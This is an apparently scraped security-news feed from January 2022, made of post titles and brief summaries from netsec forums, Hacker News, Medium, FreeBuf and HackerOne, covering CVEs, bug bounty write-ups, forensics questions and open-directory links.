submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    we run an webapp in azure. users can upload .zip, .pdf, .png, .jpeg and .csv files. therefore an antivurs scanner is needed for those files. at another project we use clamav in an azure container instance. the problem is containers don´t scale very well. we would prefere a SAAS solution in azure but there are few options. we need a solution that is scalable and doesn´t send the files to servers outside the EU due to the local data protection law. at best the software is made by an EU company. we thought about "abusing" an azure storage by uploading the files there and waiting if microsoft defender for cloud reacts. anyone any experience with this? how fast would such a solution be? any recommendations? TLDR: need antivirus software for file upload webapp in azure SAAS prefered scalability compliant with EU data protection law Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec I just wanted to ask a quick question if these specific flags out of the bunch that Brave runs is of any concern? The names sparked my interest and a bit of panic when I first noticed after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed ​ Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict hosting providers ability to reach, view and use a machine outside of the usual disk encryption. While I am sure it’s a a long shot but there does exist a possibility where can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different ftp from computer builder. I think most of them are already present on this / r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them) HP FTP : ftp://ftp.hp.com |Url: ftp://ftp.hp.com/||Urls file| |Extension (Top 5)|Files|Size| |.exe|106,034|5.61 TiB| |.ibr|862|5.21 TiB| |.zip|10,739|443.95 GiB| |.fmw|290|384.7 GiB| |.iso|256|322.51 GiB| |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB| |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)| Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/) IBM FTP : ftp://ftp.software.ibm.com/ |Url: ftp://ftp.software.ibm.com/||Urls file| |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, Today i want to tell you a short story but this story has long memory for me. In this story i found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes overtime. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-13 Review
    将EXE程序通过Powershell形式实现无文件运行 by ourren QRS 2021 论文录用列表 by ourren 从分析一个赌球APP中入门安卓逆向、开发、协议分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-13 Review
    将EXE程序通过Powershell形式实现无文件运行 by ourren QRS 2021 论文录用列表 by ourren 从分析一个赌球APP中入门安卓逆向、开发、协议分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 大量美国和加拿大人的财务数据遭曝光;Firefox 出现无法联网问题
    全球动态1. 因解决BUG不力,密码管理工具LastPass或面临2000万欧元罚款因解决问题不力等诸多问题,知名密码管理工具 LastPass 正面临 2000 万欧元的 GDPR 罚款风险。[阅读原文]2.美国一监狱遭勒索软件攻击,监控摄像头与门禁系统被破坏美国新墨西哥州中部的阿尔伯克基(Albuquerque)地区监狱上周遭勒索软件攻击,监控摄像头无法访问、自动门禁系统也受到了影响,导致囚犯  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业远程办公的安全之道
    从安全角度来看,远程办公意味着办公网络的边界被打破,企业该如何重新审视自身的安全策略,降低安全风险?  ( 1 min )
    数百万便携式路由器受KCodes NetUSB 漏洞影响
    涉及厂商包括 Netgear、TP-Link、Tenda、EDiMAX、D-Link 和西部数据。  ( 1 min )
    大量美国和加拿大人的财务数据遭曝光
    Website Planet网络安全员发现一个配置错误的数据库,该数据库暴露了约 82万 条记录,其中约 60万 条是客户信用记录。  ( 1 min )
    跨平台恶意后门 SysJoker 行为分析及解码
    2021 年 12 月,Intezer 发现了一个能够对 Windows、Mac 和 Linux 发起攻击的跨平台后门 SysJoker。  ( 1 min )
    新型恶意软件SysJoker正对Windows、Linux 和macOS 操作系统构成威胁
    SysJoker 新型恶意软件正对Windows、Linux 和 macOS 操作系统构成威胁,可利用跨平台后门来从事间谍活动。  ( 1 min )
    《“十四五”数字经济发展规划》,网络安全再被重点提及
    《规划》的第九章“着力强化数字经济安全体系”系统阐述了网络安全对于数字经济的独特作用及重要性。
    研读网络安全法律法规,提升技术管理者 “法” 商
    了解不同法律法规的等级层次,可以帮助我们更好的理解国家在立法过程中的目的。  ( 1 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC
    I briefly mentioned using DKIM to verify an email’s sender in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into how organizations can help stop email spoofing using a combination of three... The post Real or Fake? Spoof-Proofing Email With SPF, DKIM, and DMARC appeared first on TrustedSec.  ( 12 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three part of article about honeypots. As here, in the first article we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attacks vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — wie ich versehentlich eine Tarnbehörde in der Bundesverwaltung…
    Vor einigen Tagen tat ich etwas, dass ist so ungewöhnlich, das es scheinbar noch fast niemand vor mir gemacht hat: Ich habe mir die Liste… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    it's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch video's of how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these video's don't even make sense (e.g. we are for 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have setup security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify there needs. ;) Just looking for some experiences and idea's. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi I work in the InfoSec industry and having worked from home for the last year or so, I want to now start doing up my room and make it very techy At the moment, I do not have anything too exciting or amazing but I am interested to know what your home setups are like Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says I get to help design a cyber security room for a community college. I want to ask the Netsec community. What would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would of made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professors lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands on access as both an admin and as a non privileged user. The lab itself is pretty simple--its not to be supposed running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications but I'm wondering if were limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on whats doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However they don't have option for wireless headsets, only wired ones. They also advise against connecting any non company authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in well-known MNC bank in networking field.. & I'm terribly nervous Guys, can you help me with some common questions asked in Bank Networking Interview.. submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience what are the best Identity Theft services for Companies/Brands (not for indivisuals)? I an talking of services like: Identity Guard LifeLock IdentityForce Watchdog Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick google search makes it sound like this might actual be some kind of device setup to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peak to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result: Nmap scan report for 192.168.0.1 Host is up (0.033s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5000/tcp open upnp 8081/tcp filtered blackice-icecap 8082/tcp filtered blackice-alerts ​ submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all Simple question but very hard to find the answer. When I dont have access to good wifi, Im going to be using mobile hotspot to access the internet on my laptop. Question is, where do i turn on my vpn - on my laptop? Or on my phone? Or just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not regular AD server)? If so any directions on how to extract the hashes using standard tools like ImPacket or DSInternals? We have procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I can across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college course, I want to get more practice in me just want to know if Cybrary is worth the annual membership. If any one has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANs link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
    Gartner 2021 漏洞评估产品市场指南 by ourren 网安新兴赛道及厂商速查· Cyber Security Billboard by ourren 网络空间测绘溯源技术剖析 by ourren 网络空间威胁狩猎的研究综述 by ourren 长安"战疫"-WriteUp by ourren APT组织情报研究年鉴 2021 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-12 Review
    Gartner 2021 漏洞评估产品市场指南 by ourren 网安新兴赛道及厂商速查· Cyber Security Billboard by ourren 网络空间测绘溯源技术剖析 by ourren 网络空间威胁狩猎的研究综述 by ourren 长安"战疫"-WriteUp by ourren APT组织情报研究年鉴 2021 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

    FreeBuf早报 | 欧盟将启动供应链安全大规模演练;特斯拉汽车软件被曝安全缺陷
    一名安全研究人员表示,部分特斯拉汽车软件存在“严重”缺陷,该缺陷能够远程解锁车辆门窗、在无钥匙状态下启动车辆并禁用安全系统。  ( 1 min )
    等保2.0测评安全计算环境GaussdDB过程指南(华为高斯数据库)
    一次华为私有云的高斯数据库测评指南  ( 1 min )
    中小企业容易成为网络攻击的目标
    51%的中小企业经历过网络安全漏洞,由此带来的网络犯罪成为了亟待解决的问题。
    长城汽车诚聘多名安全人才
    长城汽车是成立于1984年的中国汽车品牌,诚聘多位安全人才。  ( 1 min )
    密码技术在个人信息合规中的应用与落地
    个人信息合规落地,尤其是个人信息的安全保障义务,不仅仅是法律问题,更是信息安全技术问题。  ( 1 min )
    RedLine 信息窃取器的新变种!伪装成Omicron 病例计数器传播
    RedLine 的目标是存储在浏览器上的用户账户凭证等信息。  ( 1 min )
    斗象PRS-NTA通过华为鲲鹏 920兼容性认证
    坚持信创,斗象科技不断深化国产化生态合作。
    安卓版Firefox Focus浏览器增强了隐私保护,阻止跨站点跟踪
    安卓版火狐Focus浏览器进一步强化了隐私保护功能,可防止cookie 被用于广告和分析用户行为,以此来保护用户在浏览内容时免受跨站点跟踪。  ( 1 min )
    常见的加密方式实例
    通常在我们测逻辑漏洞或写爬虫的时候,如果遇到前端加密,我们可以选择将加密算法拖出来,对自己调试的参数进行加密。  ( 10 min )
    微软:powerdir 漏洞允许访问macOS用户数据
    微软发布消息称,威胁行为者可以利用 macOS 漏洞绕过透明,同意和控制(TCC)框架来访问用户受保护的数据。  ( 1 min )
    工业网络靶场漫谈(七)|发展趋势展望
    数字化转型正在加速推动OT与IT的融合发展,与此同时OT与IT融合的网络安全风险也同步演进发展。  ( 1 min )
    黑客用漏洞清除债务 这种漏洞如何“早知道”
    利用漏洞清除债务,盗取数据,一键获取XX游戏的所有账户登陆权限,这些看似爽文里的“骚操作”其实早就在现实中上演。  ( 1 min )
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss about one of the toughest exams from Offensive Security, the web expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    learning prerequisites for hacking and bug bounty?
    hey computer geeks. i am writing this cause i have faced very problems in getting started in “cyber security” cause of i don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email addresses, or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
  • Open

    Finding vulnerabiities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40 pages paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    hey, guys, ’s I hope you doing well. Today I share some Linux priv esc resources That help you in solving CTF and in web-pentesting and… Continue reading on Medium »  ( 1 min )
